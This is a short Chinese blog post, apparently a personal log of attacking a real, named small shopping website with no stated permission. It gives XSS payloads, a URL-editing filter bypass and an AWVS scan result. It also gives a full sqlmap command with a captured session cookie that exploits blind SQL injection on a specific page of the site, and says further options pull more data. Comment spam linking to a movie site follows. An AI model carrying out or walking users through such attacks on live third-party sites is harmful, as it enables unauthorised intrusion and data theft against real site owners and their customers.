最近一直在忙着挖个洞出来
听说一般小点的购物网站会存在漏洞比较多
于是找到了这个http://www.kaitaibh.com
遵循xss“见框就插”的原则
在搜索框随意插入xss攻击代码
<script>alert(0)</script>
<img src=0 onerrot=alert(0)>
开始并未触发 发现url中 > 被过滤
直接在url改
成功
然后想试试有没有逻辑漏洞,结果注册需要实体店会员就放弃了
然后awvs扫了一下(其实在看到例如id=997这种情况也可以拖进sqlmap试试有没有注入)
发现有SQL盲注漏洞
开始利用SQLMap进行注入
一开始失败
原因是此链接需要cookie维持会话
通过开发者工具获取cookie
构造攻击代码
python sqlmap.py -u http://www.kaitaibh.com/List.aspx?c1=721 --cookie "ASP.NET_SessionId=q3zyheyf51mgdzjkvywvzund; __tins__17307904=%7B%22sid%22%3A%201582435208829%2C%20%22vd%22%3A%207%2C%20%22expires%22%3A%201582437399178%7D; __51cke__=; __51laig__=7"
注入成功
加上 -b 可获取数据库版本
其他命令即可获取更多信息
2 条评论
555
《东北不冷》剧情片高清在线免费观看:https://www.jgz518.com/xingkong/61571.html